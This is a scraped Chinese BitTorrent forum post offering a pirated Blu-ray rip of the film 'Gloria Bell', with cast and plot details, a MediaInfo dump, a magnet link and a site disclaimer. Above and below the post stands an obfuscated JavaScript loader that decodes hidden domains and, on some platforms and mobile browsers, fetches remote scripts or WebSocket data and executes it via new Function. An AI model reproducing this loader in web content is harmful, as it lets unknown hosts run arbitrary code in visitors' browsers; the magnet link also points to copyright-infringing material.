葛洛莉亚·贝尔[中文字幕].Gloria.Bell.2018.1080p.BluRay.DD5.1.x265-10bit 7.70GB

版主小s 19天前 249

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 葛洛莉亚·贝尔 / 再单身出发(港) / 老娘爱最大(台) / 葛洛利亚 / Gloria

◎片 名 Gloria Bell

◎年 代 2018

◎产 地 美国

◎类 别 剧情 / 爱情

◎语 言 英语

◎上映日期 2018-09-07(多伦多电影节) / 2019-03-08(美国)

◎IMDb链接 https://www.imdb.com/title/tt6902696/

◎豆瓣评分 7.0/10 (2577人评价)

◎豆瓣链接 https://movie.douban.com/subject/27062816/

◎片 长 102分钟

◎导 演 塞巴斯蒂安·莱里奥 Sebastián Lelio (id:1033335)

◎编 剧 爱丽丝·约翰逊·玻尔 Alice Johnson Boher (id:1416973)

塞巴斯蒂安·莱里奥 Sebastián Lelio (id:1033335)

刚扎洛·玛萨 Gonzalo Maza (id:1326813)

◎演 员 朱丽安·摩尔 Julianne Moore (id:1054519)

约翰·特托罗 John Turturro (id:1031851)

迈克尔·塞拉 Michael Cera (id:1053576)

西恩·奥斯汀 Sean Astin (id:1031818)

布拉德·加内特 Brad Garrett (id:1002727)

阿兰娜·乌巴赫 Alanna Ubach (id:1056068)

珍妮·特里普里霍恩 Jeanne Tripplehorn (id:1017915)

霍兰德·泰勒 Holland Taylor (id:1013862)

丽塔·威尔逊 Rita Wilson (id:1041124)

卡西·汤普森 Cassi Thomson (id:1243667)

克里斯·马尔基 Chris Mulkey (id:1048223)

凯伦·皮斯托里斯 Caren Pistorius (id:1349040)

泰森·里特 Tyson Ritter (id:1045016)

珍妮卡·贝尔格雷 Jenica Bergere (id:1066955)

巴巴拉·苏科瓦 Barbara Sukowa (id:1005053)

桑德拉·罗斯科 Sandra Rosko (id:1394521)

南希·德马尔斯 Nancy DeMars (id:1394842)

巴尔巴拉·斯科拉罗 Barbara Scolaro (id:1014893)

杰西·欧文 Jesse Erwin (id:1083619)

科琳娜·哈尼 Corinna Harney (id:1032524)

克里斯托弗·艾伯 Christopher Aber (id:1054583)

托马斯·詹姆斯·凯普纳 Thomas James Kepner (id:1242071)

卡尔文·迪恩 Calvin Dean (id:1460375)

塞巴斯蒂安·莱里奥 Sebastián Lelio (id:1033335)

◎标 签 女性 / 美国 / 爱情 / 剧情 / 中年 / 2018 / 2019 / 喜剧

◎简 介

葛洛莉亚(朱丽安·摩尔 Julianne Moore 饰)曾经有过一段失败的婚姻,但是这段经历并没有让她对生活和爱情失去希望,正相反,如今的葛洛莉亚觉得自己比从前变得更好了。平日里,葛洛莉亚喜欢去一间舞蹈俱乐部跳舞,在那里,葛洛莉亚邂逅了名为亚诺(约翰·特托罗 John Turturro 饰)的男子。

和葛洛莉亚一样,亚诺刚刚和妻子离婚了,他有一个孩子,跟着前妻生活。相似的经历让葛洛莉亚和亚诺之间很快就碰撞出了爱情的火花,很快两人就走到了一起。然而,激情退却之后,两人之间的问题也渐渐浮现。虽然亚诺和妻子离婚了,但很显然这个女人并不能适应没有亚诺的生活,她的阴魂不散成为了葛洛莉亚和亚诺两人的关系里埋藏的一颗定时炸弹。

◎获奖情况 (共1项)

第24届金卫星奖 (2020)

电影部门 喜剧/音乐片最佳女主角(提名)

└──朱丽安·摩尔 (id:1054519)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 182291781655581476847271100151827446090 (0x89241EBE423EA8CDE25554FEDA96B94A)

  4. Complete name : [email protected]mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.70 GiB

  8. Duration : 1 h 41 min

  9. Overall bit rate : 10.8 Mb/s

  10. Movie name : Gloria Bell 2018 1080p BluRay DD5.1 [email protected]

  11. Encoded date : UTC 2021-11-12 01:28:04

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 41 min

  21. Bit rate : 10.1 Mb/s

  22. Width : 1 920 pixels

  23. Height : 800 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.275

  31. Stream size : 7.22 GiB (94%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : AC-3

  39. Format/Info : Audio Coding 3

  40. Commercial name : Dolby Digital

  41. Codec ID : A_AC3

  42. Duration : 1 h 41 min

  43. Bit rate mode : Constant

  44. Bit rate : 640 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : L R C LFE Ls Rs

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 31.250 FPS (1536 SPF)

  49. Compression mode : Lossy

  50. Stream size : 467 MiB (6%)

  51. Title : English

  52. Language : English

  53. Service kind : Complete Main

  54. Default : Yes

  55. Forced : No


  56. Text #1

  57. ID : 3

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 1 h 31 min

  63. Bit rate : 23.5 kb/s

  64. Count of elements : 1467

  65. Stream size : 15.4 MiB (0%)

  66. Title : CHS

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No


  70. Text #2

  71. ID : 4

  72. Format : PGS

  73. Muxing mode : zlib

  74. Codec ID : S_HDMV/PGS

  75. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  76. Duration : 1 h 31 min

  77. Bit rate : 24.3 kb/s

  78. Count of elements : 1467

  79. Stream size : 16.0 MiB (0%)

  80. Title : CHT

  81. Language : Chinese

  82. Default : No

  83. Forced : No


  84. Menu

  85. 00:00:00.000 : en:Chapter 01

  86. 00:12:58.820 : en:Chapter 02

  87. 00:27:00.702 : en:Chapter 03

  88. 00:40:29.344 : en:Chapter 04

  89. 00:55:03.425 : en:Chapter 05

  90. 01:09:01.763 : en:Chapter 06

  91. 01:21:48.737 : en:Chapter 07

  92. 01:36:40.086 : en:Chapter 08




复制代码


TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:A8F4E59272E2D613F9A425F6F2874594BFCDF7F2

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};